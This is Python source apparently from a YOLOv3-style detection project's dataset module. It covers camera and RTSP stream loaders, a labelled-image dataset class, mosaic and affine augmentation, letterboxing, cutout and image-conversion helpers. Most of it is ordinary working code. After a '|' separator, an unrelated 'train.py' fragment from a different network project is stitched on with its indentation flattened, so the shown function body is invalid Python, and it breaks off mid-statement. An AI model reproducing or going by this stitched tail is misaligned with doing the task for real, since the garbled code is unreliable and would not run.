        # pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink'  # GStreamer

        # https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
        # https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package  # install help
        # pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink"  # GStreamer

        self.pipe = pipe
        self.cap = cv2.VideoCapture(pipe)  # video capture object
        self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3)  # set buffer size

    def __iter__(self):
        self.count = -1
        return self

    def __next__(self):
        self.count += 1
        if cv2.waitKey(1) == ord('q'):  # q to quit
            self.cap.release()
            cv2.destroyAllWindows()
            raise StopIteration

        # Read frame
        if self.pipe == 0:  # local camera
            ret_val, img0 = self.cap.read()
            img0 = cv2.flip(img0, 1)  # flip left-right (mirror view)
        else:  # IP camera
            n = 0
            while True:
                n += 1
                self.cap.grab()
                if n % 30 == 0:  # skip frames: decode only every 30th grab
                    ret_val, img0 = self.cap.retrieve()
                    if ret_val:
                        break

        # Print
        assert ret_val, 'Camera Error %s' % self.pipe
        img_path = 'webcam.jpg'
        print('webcam %g: ' % self.count, end='')

        # Padded resize
        img = letterbox(img0, new_shape=self.img_size)[0]

        # Convert
        img = img[:, :, ::-1].transpose(2, 0, 1)  # BGR to RGB, to 3x416x416
        img = np.ascontiguousarray(img)

        return img_path, img, img0, None

    def __len__(self):
        return 0
class LoadStreams:  # multiple IP or RTSP cameras
    """Read several video streams concurrently (one daemon thread per stream)
    and yield batched, letterboxed frames for inference.

    *sources* is either a text file with one stream URL per line, or a single
    URL/string. Each __next__ returns
    ``(sources, batched 3-channel RGB array, list of original BGR frames, None)``.
    """
    def __init__(self, sources='streams.txt', img_size=640):
        self.mode = 'images'
        self.img_size = img_size

        if os.path.isfile(sources):
            with open(sources, 'r') as f:
                sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
        else:
            sources = [sources]

        n = len(sources)
        self.imgs = [None] * n  # latest frame per stream, overwritten by the reader threads
        self.sources = sources
        for i, s in enumerate(sources):
            # Start the thread to read frames from the video stream
            print('%g/%g: %s... ' % (i + 1, n, s), end='')
            cap = cv2.VideoCapture(0 if s == '0' else s)
            assert cap.isOpened(), 'Failed to open %s' % s
            w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
            h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
            fps = cap.get(cv2.CAP_PROP_FPS) % 100
            _, self.imgs[i] = cap.read()  # guarantee first frame
            thread = Thread(target=self.update, args=([i, cap]), daemon=True)
            print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
            thread.start()
        print('')  # newline

        # check for common shapes
        s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0)  # inference shapes
        self.rect = np.unique(s, axis=0).shape[0] == 1  # rect inference if all shapes equal
        if not self.rect:
            print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')

    def update(self, index, cap):
        # Read next stream frame in a daemon thread
        n = 0
        while cap.isOpened():
            n += 1
            # _, self.imgs[index] = cap.read()
            cap.grab()
            if n == 4:  # read every 4th frame to keep up with the stream
                _, self.imgs[index] = cap.retrieve()
                n = 0
            time.sleep(0.01)  # wait time

    def __iter__(self):
        self.count = -1
        return self

    def __next__(self):
        self.count += 1
        img0 = self.imgs.copy()  # snapshot the frames the threads have written
        if cv2.waitKey(1) == ord('q'):  # q to quit
            cv2.destroyAllWindows()
            raise StopIteration

        # Letterbox
        img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]

        # Stack
        img = np.stack(img, 0)

        # Convert
        img = img[:, :, :, ::-1].transpose(0, 3, 1, 2)  # BGR to RGB, to bsx3x416x416
        img = np.ascontiguousarray(img)

        return self.sources, img, img0, None

    def __len__(self):
        return 0  # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset):  # for training/testing
    """Dataset of images plus YOLO-format label files for training/testing.

    Labels are validated and cached (optionally to a sibling ``.npy`` file);
    images may be cached in RAM. Supports rectangular training, mosaic/HSV/
    affine augmentation and single-class mode.

    Fixes applied in this revision: ``np.int`` (deprecated, removed in
    numpy >= 1.24) replaced by ``int``; bare ``except:`` clauses narrowed to
    ``except Exception`` so KeyboardInterrupt/SystemExit still propagate.
    """

    def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
                 cache_images=False, single_cls=False, stride=32, pad=0.0):
        # Resolve the image list: *path* is either a .txt listing or a folder
        try:
            path = str(Path(path))  # os-agnostic
            parent = str(Path(path).parent) + os.sep
            if os.path.isfile(path):  # file
                with open(path, 'r') as f:
                    f = f.read().splitlines()
                f = [x.replace('./', parent) if x.startswith('./') else x for x in f]  # local to global path
            elif os.path.isdir(path):  # folder
                f = glob.iglob(path + os.sep + '*.*')
            else:
                raise Exception('%s does not exist' % path)
            self.img_files = [x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats]
        except Exception:
            raise Exception('Error loading data from %s. See %s' % (path, help_url))

        n = len(self.img_files)
        assert n > 0, 'No images found in %s. See %s' % (path, help_url)
        bi = np.floor(np.arange(n) / batch_size).astype(int)  # batch index
        nb = bi[-1] + 1  # number of batches

        self.n = n  # number of images
        self.batch = bi  # batch index of image
        self.img_size = img_size
        self.augment = augment
        self.hyp = hyp
        self.image_weights = image_weights
        self.rect = False if image_weights else rect
        self.mosaic = self.augment and not self.rect  # load 4 images at a time into a mosaic (only during training)
        self.mosaic_border = [-img_size // 2, -img_size // 2]
        self.stride = stride

        # Define labels: mirror each image path into the 'labels' tree with a .txt suffix
        self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt')
                            for x in self.img_files]

        # Read image shapes (wh), cached in a sibling '.shapes' file
        sp = path.replace('.txt', '') + '.shapes'  # shapefile path
        try:
            with open(sp, 'r') as f:  # read existing shapefile
                s = [x.split() for x in f.read().splitlines()]
                assert len(s) == n, 'Shapefile out of sync'
        except Exception:  # missing or stale shapefile: rebuild it from the images
            s = [exif_size(Image.open(f)) for f in tqdm(self.img_files, desc='Reading image shapes')]
            np.savetxt(sp, s, fmt='%g')  # overwrites existing (if any)

        self.shapes = np.array(s, dtype=np.float64)

        # Rectangular Training  https://github.com/ultralytics/yolov3/issues/232
        if self.rect:
            # Sort by aspect ratio so each batch contains similarly-shaped images
            s = self.shapes  # wh
            ar = s[:, 1] / s[:, 0]  # aspect ratio
            irect = ar.argsort()
            self.img_files = [self.img_files[i] for i in irect]
            self.label_files = [self.label_files[i] for i in irect]
            self.shapes = s[irect]  # wh
            ar = ar[irect]

            # Set training image shapes per batch
            shapes = [[1, 1]] * nb
            for i in range(nb):
                ari = ar[bi == i]
                mini, maxi = ari.min(), ari.max()
                if maxi < 1:
                    shapes[i] = [maxi, 1]
                elif mini > 1:
                    shapes[i] = [1, 1 / mini]

            self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(int) * stride

        # Cache labels
        self.imgs = [None] * n
        self.labels = [np.zeros((0, 5), dtype=np.float32)] * n
        create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
        nm, nf, ne, ns, nd = 0, 0, 0, 0, 0  # number missing, found, empty, datasubset, duplicate
        np_labels_path = str(Path(self.label_files[0]).parent) + '.npy'  # saved labels in *.npy file
        if os.path.isfile(np_labels_path):
            s = np_labels_path  # print string
            x = np.load(np_labels_path, allow_pickle=True)
            if len(x) == n:
                self.labels = x
                labels_loaded = True
        else:
            s = path.replace('images', 'labels')

        pbar = tqdm(self.label_files)
        for i, file in enumerate(pbar):
            if labels_loaded:
                l = self.labels[i]
                # np.savetxt(file, l, '%g')  # save *.txt from *.npy file
            else:
                try:
                    with open(file, 'r') as f:
                        l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
                except Exception:  # label file missing or unreadable
                    nm += 1  # print('missing labels for image %s' % self.img_files[i])  # file missing
                    continue

            if l.shape[0]:
                # validate: 5 columns, non-negative, normalized coordinates
                assert l.shape[1] == 5, '> 5 label columns: %s' % file
                assert (l >= 0).all(), 'negative labels: %s' % file
                assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
                if np.unique(l, axis=0).shape[0] < l.shape[0]:  # duplicate rows
                    nd += 1  # print('WARNING: duplicate rows in %s' % self.label_files[i])  # duplicate rows
                if single_cls:
                    l[:, 0] = 0  # force dataset into single-class mode
                self.labels[i] = l
                nf += 1  # file found

                # Create subdataset (a smaller dataset)
                if create_datasubset and ns < 1E4:
                    if ns == 0:
                        create_folder(path='./datasubset')
                        os.makedirs('./datasubset/images')
                    exclude_classes = 43
                    if exclude_classes not in l[:, 0]:
                        ns += 1
                        # shutil.copy(src=self.img_files[i], dst='./datasubset/images/')  # copy image
                        with open('./datasubset/images.txt', 'a') as f:
                            f.write(self.img_files[i] + '\n')

                # Extract object detection boxes for a second stage classifier
                if extract_bounding_boxes:
                    p = Path(self.img_files[i])
                    img = cv2.imread(str(p))
                    h, w = img.shape[:2]
                    for j, x in enumerate(l):
                        f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
                        if not os.path.exists(Path(f).parent):
                            os.makedirs(Path(f).parent)  # make new output folder

                        b = x[1:] * [w, h, w, h]  # box
                        b[2:] = b[2:].max()  # rectangle to square
                        b[2:] = b[2:] * 1.3 + 30  # pad
                        b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(int)

                        b[[0, 2]] = np.clip(b[[0, 2]], 0, w)  # clip boxes outside of image
                        b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
                        assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
            else:
                ne += 1  # print('empty labels for image %s' % self.img_files[i])  # file empty
                # os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i]))  # remove

            pbar.desc = 'Caching labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
                s, nf, nm, ne, nd, n)
        # n == 20288 special-cases one known dataset size with no labels
        assert nf > 0 or n == 20288, 'No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
        if not labels_loaded and n > 1000:
            print('Saving labels to %s for faster future loading' % np_labels_path)
            np.save(np_labels_path, self.labels)  # save for next time

        # Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
        if cache_images:  # if training
            gb = 0  # Gigabytes of cached images
            pbar = tqdm(range(len(self.img_files)), desc='Caching images')
            self.img_hw0, self.img_hw = [None] * n, [None] * n
            for i in pbar:  # max 10k images
                self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i)  # img, hw_original, hw_resized
                gb += self.imgs[i].nbytes
                pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)

        # Detect corrupted images https://medium.com/joelthchao/programmatically-detect-corrupted-image-8c1b2006c3d3
        detect_corrupted_images = False
        if detect_corrupted_images:
            from skimage import io  # conda install -c conda-forge scikit-image
            for file in tqdm(self.img_files, desc='Detecting corrupted images'):
                try:
                    _ = io.imread(file)
                except Exception:
                    print('Corrupted image detected: %s' % file)

    def __len__(self):
        return len(self.img_files)

    # def __iter__(self):
    #     self.count = -1
    #     print('ran dataset iter')
    #     #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
    #     return self

    def __getitem__(self, index):
        """Return (CHW RGB tensor, labels tensor (n,6), image path, shapes-or-None)."""
        if self.image_weights:
            index = self.indices[index]

        hyp = self.hyp
        if self.mosaic:
            # Load mosaic
            img, labels = load_mosaic(self, index)
            shapes = None

        else:
            # Load image
            img, (h0, w0), (h, w) = load_image(self, index)

            # Letterbox
            shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size  # final letterboxed shape
            img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
            shapes = (h0, w0), ((h / h0, w / w0), pad)  # for COCO mAP rescaling

            # Load labels
            labels = []
            x = self.labels[index]
            if x.size > 0:
                # Normalized xywh to pixel xyxy format
                labels = x.copy()
                labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0]  # pad width
                labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1]  # pad height
                labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
                labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]

        if self.augment:
            # Augment imagespace (mosaic already applied its own affine)
            if not self.mosaic:
                img, labels = random_affine(img, labels,
                                            degrees=hyp['degrees'],
                                            translate=hyp['translate'],
                                            scale=hyp['scale'],
                                            shear=hyp['shear'])

            # Augment colorspace
            augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])

            # Apply cutouts
            # if random.random() < 0.9:
            #     labels = cutout(img, labels)

        nL = len(labels)  # number of labels
        if nL:
            # convert xyxy to xywh
            labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])

            # Normalize coordinates 0 - 1
            labels[:, [2, 4]] /= img.shape[0]  # height
            labels[:, [1, 3]] /= img.shape[1]  # width

        if self.augment:
            # random left-right flip
            lr_flip = True
            if lr_flip and random.random() < 0.5:
                img = np.fliplr(img)
                if nL:
                    labels[:, 1] = 1 - labels[:, 1]

            # random up-down flip
            ud_flip = False
            if ud_flip and random.random() < 0.5:
                img = np.flipud(img)
                if nL:
                    labels[:, 2] = 1 - labels[:, 2]

        # column 0 is reserved for the image index, filled in by collate_fn
        labels_out = torch.zeros((nL, 6))
        if nL:
            labels_out[:, 1:] = torch.from_numpy(labels)

        # Convert
        img = img[:, :, ::-1].transpose(2, 0, 1)  # BGR to RGB, to 3x416x416
        img = np.ascontiguousarray(img)

        return torch.from_numpy(img), labels_out, self.img_files[index], shapes

    @staticmethod
    def collate_fn(batch):
        # Stack (img, label, path, shapes) samples into a batch; writes each
        # sample's batch position into label column 0 for build_targets()
        img, label, path, shapes = zip(*batch)  # transposed
        for i, l in enumerate(label):
            l[:, 0] = i  # add target image index for build_targets()
        return torch.stack(img, 0), torch.cat(label, 0), path, shapes
def load_image(self, index):
    """Load one dataset image, preferring the in-memory cache.

    Returns (img, (h0, w0) original size, (h, w) resized size); the longest
    side is scaled to self.img_size on a cache miss.
    """
    cached = self.imgs[index]
    if cached is not None:
        # cache hit: sizes were recorded when the image was cached
        return cached, self.img_hw0[index], self.img_hw[index]

    path = self.img_files[index]
    img = cv2.imread(path)  # BGR
    assert img is not None, 'Image Not Found ' + path
    h0, w0 = img.shape[:2]  # original height/width
    scale = self.img_size / max(h0, w0)
    if scale != 1:
        # INTER_AREA gives better quality when shrinking; INTER_LINEAR when
        # enlarging or when augmenting
        interp = cv2.INTER_AREA if scale < 1 and not self.augment else cv2.INTER_LINEAR
        img = cv2.resize(img, (int(w0 * scale), int(h0 * scale)), interpolation=interp)
    return img, (h0, w0), img.shape[:2]
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
    """Apply random HSV colour jitter to BGR image *img*, modifying it in place."""
    gains = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1  # random per-channel gains
    hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
    dtype = img.dtype  # uint8

    # build one lookup table per channel instead of touching every pixel in Python
    base = np.arange(0, 256, dtype=np.int16)
    lut_hue = ((base * gains[0]) % 180).astype(dtype)  # OpenCV hue wraps at 180
    lut_sat = np.clip(base * gains[1], 0, 255).astype(dtype)
    lut_val = np.clip(base * gains[2], 0, 255).astype(dtype)

    img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
    cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img)  # write back into img; no return needed
def load_mosaic(self, index):
    # loads images in a mosaic
    """Build a 2s x 2s mosaic from image *index* plus 3 random dataset images.

    Returns (mosaic image, labels concatenated in mosaic pixel coordinates)
    after applying random_affine with the mosaic border removed.
    """
    labels4 = []
    s = self.img_size
    yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border]  # mosaic center x, y
    indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)]  # 3 additional image indices
    for i, index in enumerate(indices):
        # Load image
        img, _, (h, w) = load_image(self, index)

        # place img in img4: the (a) coords index the big mosaic canvas,
        # the (b) coords index the small source image
        if i == 0:  # top left
            img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8)  # base image with 4 tiles
            x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc  # xmin, ymin, xmax, ymax (large image)
            x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h  # xmin, ymin, xmax, ymax (small image)
        elif i == 1:  # top right
            x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
            x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
        elif i == 2:  # bottom left
            x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
            # NOTE(review): later upstream code uses plain `w` instead of
            # max(xc, w); numpy slice clipping makes the two read the same
            # pixels, but confirm before relying on x2b elsewhere.
            x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
        elif i == 3:  # bottom right
            x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
            x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)

        img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b]  # img4[ymin:ymax, xmin:xmax]
        padw = x1a - x1b  # shift from source-image coords to mosaic coords
        padh = y1a - y1b

        # Labels
        x = self.labels[index]
        labels = x.copy()
        if x.size > 0:  # Normalized xywh to pixel xyxy format
            labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
            labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
            labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
            labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
        labels4.append(labels)

    # Concat/clip labels
    if len(labels4):
        labels4 = np.concatenate(labels4, 0)
        # np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:])  # use with center crop
        np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:])  # use with random_affine

    # Augment
    # img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)]  # center crop (WARNING, requires box pruning)
    img4, labels4 = random_affine(img4, labels4,
                                  degrees=self.hyp['degrees'],
                                  translate=self.hyp['translate'],
                                  scale=self.hyp['scale'],
                                  shear=self.hyp['shear'],
                                  border=self.mosaic_border)  # border to remove

    return img4, labels4
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
    """Resize *img* to fit *new_shape* (h, w), padding the remainder with *color*.

    Returns (padded image, (w_ratio, h_ratio), (dw, dh) padding per side).
    With auto=True the padding is reduced modulo 64 (minimum rectangle);
    with scaleFill=True the image is stretched to exactly new_shape.
    """
    # Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
    shape = img.shape[:2]  # current shape [height, width]
    if isinstance(new_shape, int):
        new_shape = (new_shape, new_shape)

    # Scale ratio (new / old)
    r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
    if not scaleup:  # only scale down, do not scale up (for better test mAP)
        r = min(r, 1.0)

    # Compute padding
    ratio = r, r  # width, height ratios
    new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))  # (w, h) for cv2.resize
    dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1]  # wh padding
    if auto:  # minimum rectangle
        dw, dh = np.mod(dw, 64), np.mod(dh, 64)  # wh padding
    elif scaleFill:  # stretch to exactly new_shape, no padding
        dw, dh = 0.0, 0.0
        # BUG FIX: new_unpad is (w, h) ordered but new_shape is (h, w); the old
        # code assigned new_shape directly and mixed the axes in the ratios,
        # which was wrong for any non-square target shape.
        new_unpad = (new_shape[1], new_shape[0])
        ratio = new_shape[1] / shape[1], new_shape[0] / shape[0]  # width, height ratios

    dw /= 2  # divide padding into 2 sides
    dh /= 2

    if shape[::-1] != new_unpad:  # resize
        img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
    top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
    left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
    img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color)  # add border
    return img, ratio, (dw, dh)
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, border=(0, 0)):
    """Apply a random rotation/scale/translation/shear to *img* and its labels.

    *targets* rows are [cls, x1, y1, x2, y2] in pixels. Boxes that end up
    tiny, mostly outside the image, or extremely elongated are dropped.
    Returns (warped image, surviving targets).
    """
    # torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
    # https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
    # targets = [cls, xyxy]

    height = img.shape[0] + border[0] * 2  # shape(h,w,c)
    width = img.shape[1] + border[1] * 2

    # Rotation and Scale
    R = np.eye(3)
    a = random.uniform(-degrees, degrees)
    # a += random.choice([-180, -90, 0, 90])  # add 90deg rotations to small rotations
    s = random.uniform(1 - scale, 1 + scale)
    # s = 2 ** random.uniform(-scale, scale)
    R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)

    # Translation
    T = np.eye(3)
    T[0, 2] = random.uniform(-translate, translate) * img.shape[1] + border[1]  # x translation (pixels)
    T[1, 2] = random.uniform(-translate, translate) * img.shape[0] + border[0]  # y translation (pixels)

    # Shear
    S = np.eye(3)
    S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180)  # x shear (deg)
    S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180)  # y shear (deg)

    # Combined rotation matrix
    M = S @ T @ R  # ORDER IS IMPORTANT HERE!!
    if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any():  # image changed
        img = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_LINEAR, borderValue=(114, 114, 114))

    # Transform label coordinates
    n = len(targets)
    if n:
        # warp points: all four corners of every box through M
        xy = np.ones((n * 4, 3))
        xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2)  # x1y1, x2y2, x1y2, x2y1
        xy = (xy @ M.T)[:, :2].reshape(n, 8)

        # create new boxes: axis-aligned hull of the warped corners
        x = xy[:, [0, 2, 4, 6]]
        y = xy[:, [1, 3, 5, 7]]
        xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T

        # # apply angle-based reduction of bounding boxes
        # radians = a * math.pi / 180
        # reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
        # x = (xy[:, 2] + xy[:, 0]) / 2
        # y = (xy[:, 3] + xy[:, 1]) / 2
        # w = (xy[:, 2] - xy[:, 0]) * reduction
        # h = (xy[:, 3] - xy[:, 1]) * reduction
        # xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T

        # reject warped points outside of image
        xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
        xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
        w = xy[:, 2] - xy[:, 0]
        h = xy[:, 3] - xy[:, 1]
        area = w * h
        area0 = (targets[:, 3] - targets[:, 1]) * (targets[:, 4] - targets[:, 2])
        ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16))  # aspect ratio
        # keep boxes >2px on each side, retaining >=20% of scaled area, not degenerate slivers
        i = (w > 2) & (h > 2) & (area / (area0 * s + 1e-16) > 0.2) & (ar < 20)
        targets = targets[i]
        targets[:, 1:5] = xy[i]

    return img, targets
def cutout(image, labels):
    """Apply randomly sized cutout masks to *image* in place and return the
    labels that remain less than 60% obscured.

    References: https://arxiv.org/abs/1708.04552
    https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
    """
    h, w = image.shape[:2]

    def bbox_ioa(box1, box2):
        # Intersection over box2 area; box1 is 4, box2 is nx4, boxes are x1y1x2y2
        box2 = box2.transpose()
        b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
        b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]

        inter = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
                (np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
        area2 = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
        return inter / area2

    # mask sizes as fractions of the image: one 1/2, two 1/4, four 1/8, ...
    scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16
    for frac in scales:
        mask_h = random.randint(1, int(h * frac))
        mask_w = random.randint(1, int(w * frac))

        # clamp the mask rectangle to the image bounds
        xmin = max(0, random.randint(0, w) - mask_w // 2)
        ymin = max(0, random.randint(0, h) - mask_h // 2)
        xmax = min(w, xmin + mask_w)
        ymax = min(h, ymin + mask_h)

        # paint the region with a random mid-range colour
        image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]

        # keep only labels not heavily covered by this mask
        if len(labels) and frac > 0.03:
            box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
            ioa = bbox_ioa(box, labels[:, 1:5])
            labels = labels[ioa < 0.60]

    return labels
def reduce_img_size(path='../data/sm4/images', img_size=1024):  # from utils.datasets import *; reduce_img_size()
    """Write copies of every image in *path* whose longest side is at most
    *img_size* into a fresh sibling '<path>_reduced' folder.
    """
    path_new = path + '_reduced'  # reduced images path
    create_folder(path_new)
    for fname in tqdm(glob.glob('%s/*.*' % path)):
        try:
            img = cv2.imread(fname)
            h, w = img.shape[:2]
            r = img_size / max(h, w)  # size ratio
            if r < 1.0:  # only shrink; never enlarge
                img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA)  # _LINEAR fastest
            fnew = fname.replace(path, path_new)  # .replace(Path(fname).suffix, '.jpg')
            cv2.imwrite(fnew, img)
        except Exception:  # was a bare except; unreadable/corrupt image
            print('WARNING: image failure %s' % fname)
def convert_images2bmp():  # from utils.datasets import *; convert_images2bmp()
    """Convert the hard-coded sm4 dataset folders to .bmp images and rewrite
    the matching label-list files so their extensions agree.
    """
    formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]

    # Save images into parallel '<path>bmp' folders
    for path in ['../data/sm4/images', '../data/sm4/background']:
        create_folder(path + 'bmp')
        for ext in formats:  # ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
            for f in tqdm(glob.glob('%s/*%s' % (path, ext)), desc='Converting %s' % ext):
                cv2.imwrite(f.replace(ext.lower(), '.bmp').replace(path, path + 'bmp'), cv2.imread(f))

    # Save labels: point the list files at the new bmp folders/extensions
    for file in ['../data/sm4/out_train.txt', '../data/sm4/out_test.txt']:
        with open(file, 'r') as f:
            lines = f.read()
        lines = lines.replace('/images', '/imagesbmp').replace('/background', '/backgroundbmp')
        for ext in formats:
            lines = lines.replace(ext, '.bmp')
        with open(file.replace('.txt', 'bmp.txt'), 'w') as f:
            f.write(lines)
def recursive_dataset2bmp(dataset='../data/sm4_bmp'):  # from utils.datasets import *; recursive_dataset2bmp()
    """Recursively convert every image under *dataset* to .bmp (for faster
    training) and rewrite extensions inside .txt list files to match.
    """
    formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
    for a, b, files in os.walk(dataset):
        for file in tqdm(files, desc=a):
            p = a + '/' + file
            s = Path(file).suffix
            if s == '.txt':  # replace text
                # fh/ext renamed: the old code reused `f` for both the file
                # handle and the loop variable, shadowing the handle
                with open(p, 'r') as fh:
                    lines = fh.read()
                for ext in formats:
                    lines = lines.replace(ext, '.bmp')
                with open(p, 'w') as fh:
                    fh.write(lines)
            elif s in formats:  # replace image
                cv2.imwrite(p.replace(s, '.bmp'), cv2.imread(p))
                if s != '.bmp':
                    # os.remove is portable and quote-safe, unlike the old
                    # os.system("rm '%s'") shell-out
                    os.remove(p)
def imagelist2folder(path='data/coco_64img.txt'):  # from utils.datasets import *; imagelist2folder()
    """Copy every image listed in text file *path* into a folder named after it
    (the list file's path minus its '.txt' suffix).
    """
    create_folder(path[:-4])  # fresh destination folder
    with open(path, 'r') as f:
        for line in f.read().splitlines():
            # shutil.copy is portable and immune to shell-quoting/injection,
            # unlike the previous os.system('cp "%s" %s') call
            shutil.copy(line, path[:-4])
            print(line)
def create_folder(path='./new_folder'):
    """Make a fresh, empty directory at *path*, removing any existing one first."""
    if os.path.exists(path):
        # wipe the previous output so callers always start from a clean folder
        shutil.rmtree(path)
    os.makedirs(path)
|
train.py | import sys
import os
import threading
import torch
from torch.autograd import Variable
import torch.utils.data
from lr_scheduler import *
import numpy
from AverageMeter import *
from loss_function import *
import datasets
import balancedsampler
import networks
from my_args import args
def train():
torch.manual_seed(args.seed)
model = networks.__dict__[args.netName](channel=args.channels,
filter_size=args.filter_size,
timestep=args.time_step,
training=True)
if args.use_cuda:
